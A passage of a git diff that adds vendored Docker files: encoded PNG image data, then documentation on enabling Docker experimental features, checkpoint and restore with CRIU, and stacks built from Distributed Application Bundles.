z&W?54av*}TKOti+XOH)^SQ9h6A^CizHG#%VulD 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 literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png b/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png new file mode 100644 index 0000000000000000000000000000000000000000..717d09d773cc46ff8297d06f66d9aa855453f35a GIT binary patch literal 4972 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 IT4fCOKM4~1IsgCw literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/experimental/README.md b/vendor/github.com/docker/docker/experimental/README.md new file mode 100644 index 0000000000..b57a5d1294 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/README.md @@ -0,0 +1,44 @@ +# Docker Experimental Features + +This page contains a list of features in the Docker engine which are +experimental. Experimental features are **not** ready for production. They are +provided for test and evaluation in your sandbox environments. + +The information below describes each feature and the GitHub pull requests and +issues associated with it. If necessary, links are provided to additional +documentation on an issue. As an active Docker user and community member, +please feel free to provide any feedback on these features you wish. + +## Use Docker experimental + +Experimental features are now included in the standard Docker binaries as of +version 1.13.0. 
+For enabling experimental features, you need to start the Docker daemon with +`--experimental` flag. +You can also enable the daemon flag via `/etc/docker/daemon.json`. e.g. + +```json +{ + "experimental": true +} +``` + +Then make sure the experimental flag is enabled: + +```bash +$ docker version -f '{{.Server.Experimental}}' +true +``` + +## Current experimental features + + * [External graphdriver plugins](../docs/extend/plugins_graphdriver.md) + * [Ipvlan Network Drivers](vlan-networks.md) + * [Docker Stacks and Distributed Application Bundles](docker-stacks-and-bundles.md) + * [Checkpoint & Restore](checkpoint-restore.md) + +## How to comment on an experimental feature + +Each feature's documentation includes a list of proposal pull requests or PRs associated with the feature. If you want to comment on or suggest a change to a feature, please add it to the existing feature PR. + +Issues or problems with a feature? Inquire for help on the `#docker` IRC channel or on the [Docker Google group](https://groups.google.com/forum/#!forum/docker-user). diff --git a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md new file mode 100644 index 0000000000..7e609b60ec --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md @@ -0,0 +1,88 @@ +# Docker Checkpoint & Restore + +Checkpoint & Restore is a new feature that allows you to freeze a running +container by checkpointing it, which turns its state into a collection of files +on disk. Later, the container can be restored from the point it was frozen. + +This is accomplished using a tool called [CRIU](http://criu.org), which is an +external dependency of this feature. A good overview of the history of +checkpoint and restore in Docker is available in this +[Kubernetes blog post](http://blog.kubernetes.io/2015/07/how-did-quake-demo-from-dockercon-work.html). 
+ +## Installing CRIU + +If you use a Debian system, you can add the CRIU PPA and install with apt-get +[from the criu launchpad](https://launchpad.net/~criu/+archive/ubuntu/ppa). + +Alternatively, you can [build CRIU from source](http://criu.org/Installation). + +You need at least version 2.0 of CRIU to run checkpoint/restore in Docker. + +## Use cases for checkpoint & restore + +This feature is currently focused on single-host use cases for checkpoint and +restore. Here are a few: + +- Restarting the host machine without stopping/starting containers +- Speeding up the start time of slow start applications +- "Rewinding" processes to an earlier point in time +- "Forensic debugging" of running processes + +Another primary use case of checkpoint & restore outside of Docker is the live +migration of a server from one machine to another. This is possible with the +current implementation, but not currently a priority (and so the workflow is +not optimized for the task). + +## Using checkpoint & restore + +A new top level command `docker checkpoint` is introduced, with three subcommands: +- `create` (creates a new checkpoint) +- `ls` (lists existing checkpoints) +- `rm` (deletes an existing checkpoint) + +Additionally, a `--checkpoint` flag is added to the container start command. 
+ +The options for checkpoint create: + + Usage: docker checkpoint create [OPTIONS] CONTAINER CHECKPOINT + + Create a checkpoint from a running container + + --leave-running=false Leave the container running after checkpoint + --checkpoint-dir Use a custom checkpoint storage directory + +And to restore a container: + + Usage: docker start --checkpoint CHECKPOINT_ID [OTHER OPTIONS] CONTAINER + + +A simple example of using checkpoint & restore on a container: + + $ docker run --security-opt=seccomp:unconfined --name cr -d busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done' + > abc0123 + + $ docker checkpoint create cr checkpoint1 + + # + $ docker start --checkpoint checkpoint1 cr + > abc0123 + +This process just logs an incrementing counter to stdout. If you `docker logs` +in between running/checkpoint/restoring you should see that the counter +increases while the process is running, stops while it's checkpointed, and +resumes from the point it left off once you restore. + +## Current limitation + +seccomp is only supported by CRIU in very up to date kernels. + +External terminal (i.e. `docker run -t ..`) is not supported at the moment. 
+If you try to create a checkpoint for a container with an external terminal, +it would fail: + + $ docker checkpoint create cr checkpoint1 + Error response from daemon: Cannot checkpoint container c1: rpc error: code = 2 desc = exit status 1: "criu failed: type NOTIFY errno 0\nlog file: /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log\n" + + $ cat /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log + Error (mount.c:740): mnt: 126:./dev/console doesn't have a proper root mount + diff --git a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md new file mode 100644 index 0000000000..b777c3919c --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md @@ -0,0 +1,202 @@ +# Docker Stacks and Distributed Application Bundles + +## Overview + +Docker Stacks and Distributed Application Bundles are experimental features +introduced in Docker 1.12 and Docker Compose 1.8, alongside the concept of +swarm mode, and Nodes and Services in the Engine API. + +A Dockerfile can be built into an image, and containers can be created from +that image. Similarly, a docker-compose.yml can be built into a **distributed +application bundle**, and **stacks** can be created from that bundle. In that +sense, the bundle is a multi-services distributable image format. + +As of Docker 1.12 and Compose 1.8, the features are experimental. Neither +Docker Engine nor the Docker Registry support distribution of bundles. + +## Producing a bundle + +The easiest way to produce a bundle is to generate it using `docker-compose` +from an existing `docker-compose.yml`. Of course, that's just *one* possible way +to proceed, in the same way that `docker build` isn't the only way to produce a +Docker image. 
+ +From `docker-compose`: + +```bash +$ docker-compose bundle +WARNING: Unsupported key 'network_mode' in services.nsqd - ignoring +WARNING: Unsupported key 'links' in services.nsqd - ignoring +WARNING: Unsupported key 'volumes' in services.nsqd - ignoring +[...] +Wrote bundle to vossibility-stack.dab +``` + +## Creating a stack from a bundle + +A stack is created using the `docker deploy` command: + +```bash +# docker deploy --help + +Usage: docker deploy [OPTIONS] STACK + +Create and update a stack from a Distributed Application Bundle (DAB) + +Options: + --file string Path to a Distributed Application Bundle file (Default: STACK.dab) + --help Print usage + --with-registry-auth Send registry authentication details to Swarm agents +``` + +Let's deploy the stack created before: + +```bash +# docker deploy vossibility-stack +Loading bundle from vossibility-stack.dab +Creating service vossibility-stack_elasticsearch +Creating service vossibility-stack_kibana +Creating service vossibility-stack_logstash +Creating service vossibility-stack_lookupd +Creating service vossibility-stack_nsqd +Creating service vossibility-stack_vossibility-collector +``` + +We can verify that services were correctly created: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility-stack_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility-stack_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility-stack_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility-stack_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility-stack_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h 
vossibility-stack_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## Managing stacks + +Stacks are managed using the `docker stack` command: + +```bash +# docker stack --help + +Usage: docker stack COMMAND + +Manage Docker stacks + +Options: + --help Print usage + +Commands: + config Print the stack configuration + deploy Create and update a stack + ls List stacks + rm Remove the stack + services List the services in the stack + tasks List the tasks in the stack + +Run 'docker stack COMMAND --help' for more information on a command. +``` + +## Bundle file format + +Distributed application bundles are described in a JSON format. When bundles +are persisted as files, the file extension is `.dab` (Docker 1.12RC2 tools use +`.dsb` for the file extension—this will be updated in the next release client). + +A bundle has two top-level fields: `version` and `services`. The version used +by Docker 1.12 tools is `0.1`. + +`services` in the bundle are the services that comprise the app. They +correspond to the new `Service` object introduced in the 1.12 Docker Engine API. + +A service has the following fields: + +
+
+ Image (required) string +
+
+ The image that the service will run. Docker images should be referenced + with full content hash to fully specify the deployment artifact for the + service. Example: + postgres@sha256:f76245b04ddbcebab5bb6c28e76947f49222c99fec4aadb0bb + 1c24821a 9e83ef +
+
+ Command []string +
+
+ Command to run in service containers. +
+
+ Args []string +
+
+ Arguments passed to the service containers. +
+
+ Env []string +
+
+ Environment variables. +
+
+ Labels map[string]string +
+
+ Labels used for setting meta data on services. +
+
+ Ports []Port +
+
+ Service ports (composed of Port (int) and + Protocol (string). A service description can + only specify the container port to be exposed. These ports can be + mapped on runtime hosts at the operator's discretion. +
+ +
+ WorkingDir string +
+
+ Working directory inside the service containers. +
+ +
+ User string +
+
+ Username or UID (format: <name|uid>[:<group|gid>]). +
+ +
+ Networks []string +
+
+ Networks that the service containers should be connected to. An entity + deploying a bundle should create networks as needed. +
+
+ +The following is an example of bundlefile with two services: + +```json +{ + "Version": "0.1", + "Services": { + "redis": { + "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", + "Networks": ["default"] + }, + "web": { + "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", + "Networks": ["default"], + "User": "web" + } + } +} +``` diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy new file mode 100644 index 0000000000..bf0512af76 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":447,"height":422,"nodeIndex":326,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach 
